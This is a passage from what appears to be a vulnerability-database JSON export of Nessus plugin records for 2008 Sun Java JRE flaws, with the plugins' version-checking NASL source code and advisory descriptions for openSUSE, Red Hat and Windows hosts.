exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-alsa-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-debuginfo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-demo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-devel-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-plugin-1.6.0.u11-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun / java-1_6_0-sun-alsa / java-1_6_0-sun-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:50:05", "description": "The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its \n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security \n checks due to the manner in which it handles the \n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java \n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java \n application that is launched through the commandline to \n escalate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar \n objects may allow an untrusted applet or application to\n escalate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to escalate its privileges with unpacking applets and \n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the \n 'shortest' form. Although not a vulnerability per se, \n it may be leveraged to exploit software that relies on \n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running \n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an \n untrusted applet or application to escalate privileges. \n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)", "edition": 30, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2008-12-04T00:00:00", "title": "Sun Java JRE Multiple Vulnerabilities (244986 et al)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "SUN_JAVA_JRE_244986.NASL", "href": "https://www.tenable.com/plugins/nessus/35030", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35030);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \n \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \n \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \n \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\",\n \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \n \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \n \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \n \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(30633, 32608, 32620, 32892);\n\n script_name(english:\"Sun Java JRE Multiple Vulnerabilities (244986 et al)\");\n script_summary(english:\"Checks version of Sun JRE\"); \n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a runtime environment that is\naffected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its \n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security \n checks due to the manner in which it handles the \n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java \n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java \n application that is launched through the commandline to \n escalate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar \n objects may allow an untrusted applet or application to\n escalate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to escalate its privileges with unpacking applets and \n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the \n 'shortest' form. Although not a vulnerability per se, \n it may be leveraged to exploit software that relies on \n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running \n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an \n untrusted applet or application to escalate privileges. \n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019736.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019737.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019738.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019739.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019740.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019741.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019742.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019759.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019793.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019794.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019797.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019798.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019799.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019800.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/6u11-139394.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/releasenotes-142123.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/releasenotes-138306.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Sun Java JDK / JRE 6 Update 11, JDK / JRE 5.0 Update 17, \nSDK / JRE 1.4.2_19, or SDK / JRE 1.3.1_24 or later and \nremove if necessary any affected versions.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2008/12/03\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\n# Check each installed JRE.\ninstalls = get_kb_list(\"SMB/Java/JRE/*\");\nif (isnull(installs)) exit(1, \"The 'SMB/Java/JRE/' KB item is missing.\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver =~ \"^[0-9.]+\")\n installed_versions = installed_versions + \" & \" + ver;\n if (\n ver =~ \"^1\\.6\\.0_(0[0-9]|10)([^0-9]|$)\" ||\n ver =~ \"^1\\.5\\.0_(0[0-9]|1[0-6])([^0-9]|$)\" ||\n ver =~ \"^1\\.4\\.([01]_|2_(0[0-9]|1[0-8]([^0-9]|$)))\" ||\n ver =~ \"^1\\.3\\.(0_|1_([01][0-9]|2[0-3]([^0-9]|$)))\"\n )\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_11 / 1.5.0_17 / 1.4.2_19 / 1.3.1_24\\n';\n }\n}\n\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:22", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin"], "id": "SUSE_11_1_JAVA-1_5_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/40235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-375.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40235);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)\");\n script_summary(english:\"Check for the java-1_5_0-sun-375 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:22", "description": "Updated java-1.5.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. These\nare summarized in the 'Advance notification of Security Updates for\nJava SE' from Sun Microsystems.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages,\nwhich correct these issues.", "edition": 28, "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.5.0-sun (RHSA-2008:1025)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-08-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-src", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-plugin", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-demo", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-devel"], "id": "REDHAT-RHSA-2008-1025.NASL", "href": "https://www.tenable.com/plugins/nessus/40732", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1025. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40732);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(32620, 32892);\n script_xref(name:\"RHSA\", value:\"2008:1025\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.5.0-sun (RHSA-2008:1025)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.5.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. These\nare summarized in the 'Advance notification of Security Updates for\nJava SE' from Sun Microsystems.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5360\"\n );\n # http://blogs.sun.com/security/entry/advance_notification_of_security_updates3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8d7aabf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1025\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 